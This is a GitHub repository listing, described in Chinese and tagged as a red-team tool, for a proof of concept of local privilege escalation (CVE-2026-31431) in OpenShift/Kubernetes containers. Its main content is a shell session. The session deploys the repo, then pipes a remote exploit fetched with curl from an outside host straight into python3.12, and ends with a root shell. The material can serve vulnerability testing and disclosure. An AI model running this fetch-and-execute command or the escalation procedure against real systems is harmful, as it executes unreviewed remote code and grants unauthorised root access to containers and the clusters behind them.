gmeghnag/TEST-CVE-2026-31431

GitHub: gmeghnag/TEST-CVE-2026-31431

针对 CVE-2026-31431 的本地提权漏洞概念验证,演示在 OpenShift/Kubernetes 容器内从非特权用户提权至 root 的完整过程。

Stars: 0 | Forks: 1

# 测试 CVE-2026-31431 ``` # oc new-app -n default https://github.com/gmeghnag/TEST-CVE-2026-31431 # oc rsh -n default deployment/test-cve-2026-31431 sh-5.1$ id uid=1001(1001) gid=0(root) groups=0(root) sh-5.1$ curl -s https://copy.fail/exp | python3.12 && su [root@test-cve-2026-31431-78f6d9cc97-n7d5j /]# id uid=0(root) gid=0(root) groups=0(root) ```
标签:Kubernetes, Maven, OpenShift, Web截图, Web报告查看器, 协议分析, 容器安全, 权限提升, 漏洞验证, 红队工具